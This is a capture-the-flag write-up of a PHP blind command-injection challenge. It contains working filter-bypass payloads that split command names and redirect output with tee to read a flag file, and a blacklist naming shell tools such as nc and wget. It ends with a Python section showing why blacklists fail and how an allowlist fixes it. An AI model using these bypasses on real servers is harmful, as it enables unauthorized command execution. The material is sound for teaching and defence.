Challenge link

Page source

<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

Whatever command is executed, nothing is echoed back. Trying ?url=whoami;sleep 3 produces a noticeable delay, which confirms that the command really is executed (blind command injection).

Bypass

The tee command reads its standard input and writes it to a file (as well as to standard output), so the output of a blind command can be written to a file under the web root and fetched afterwards. The blacklist only matches the literal strings in the regex, so splitting a command name with an empty quote pair or an escaped character defeats it. Any of the following works:

?url=l\s / | tee 1.txt
?url=l''s / | tee 1.txt
?url=l``s / | tee 1.txt
?url=dir / | tee 1.txt

Fetching 1.txt shows the output of ls, which includes flllllaaaaaaggggggg. Because la is also on the blacklist, the file name itself has to be broken up in the same way:

?url=c''at /flllll\aaaaaaggggggg | tee 2.txt
?url=tac /flllll''aaaaaaggggggg | tee 2.txt
?url=nl /flllll????????????? | tee 2.txt
?url=head /flllll''aaaaaaggggggg | tee 2.txt
?url=tail /flllll''aaaaaaggggggg | tee 2.txt
?url=tailf /flllll''aaaaaaggggggg | tee 2.txt
?url=sort /flllll''aaaaaaggggggg | tee 2.txt

Fetching 2.txt shows the flag.
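As an added example (not part of the original writeup or the challenge), the following Python reproduces the challenge's blacklist and shows why the quoting tricks above slip past it, how normalising the quoting before matching catches most of them, and why an allowlist with no shell is the actual fix. The hostname allowlist and the `build_argv` helper are assumptions about what the parameter should have accepted; the page does not say what the intended command was.

```python
import re

# The challenge's blacklist, copied from the PHP source above (PHP's /.../i is re.IGNORECASE).
BLACKLIST = re.compile(
    r'bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la'
    r'|\-|\*|\"|\>|\<|\%|\$',
    re.IGNORECASE,
)

# Assumed hardened rule: the parameter may only be a hostname-like token, nothing else.
ALLOWLIST = re.compile(r'^[A-Za-z0-9.\-]{1,253}$')


def blacklist_allows(url: str) -> bool:
    """True if the original filter would let the string through to exec()."""
    return BLACKLIST.search(url) is None


def normalize_quoting(cmd: str) -> str:
    """Undo the quoting the shell strips before it resolves the command name.

    Simplified on purpose: collapses empty '' / "" / `` pairs and drops a
    backslash that escapes the next character.  It cannot expand globs such
    as ?, so it is a detection aid, not a substitute for an allowlist.
    """
    cmd = cmd.replace("''", "").replace('""', "").replace("``", "")
    return re.sub(r"\\(.)", r"\1", cmd)


def blacklist_allows_normalized(url: str) -> bool:
    """The same blacklist, applied after normalization (what a detector should match on)."""
    return blacklist_allows(normalize_quoting(url))


def allowlist_allows(url: str) -> bool:
    """Hardened check: reject anything that is not a plain hostname-like token."""
    return ALLOWLIST.fullmatch(url) is not None


def build_argv(host: str) -> list:
    """Assumed fix for exec($url): validate, then hand an argv list to one fixed
    program with no shell in between (e.g. subprocess.run(argv, shell=False)).
    'ping' is a placeholder; the challenge never states the intended command."""
    if not allowlist_allows(host):
        raise ValueError("rejected: not a hostname")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    for p in ["l\\s / | tee 1.txt", "c''at /flllll\\aaaaaaggggggg | tee 2.txt",
              "nl /flllll????????????? | tee 2.txt"]:
        print(repr(p), blacklist_allows(p), blacklist_allows_normalized(p), allowlist_allows(p))
```

The glob payload still passes the normalized blacklist, which is the point: textual filters on a shell string can always be outrun, whereas the allowlist plus argv-style invocation rejects every payload on this page without needing to know them.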
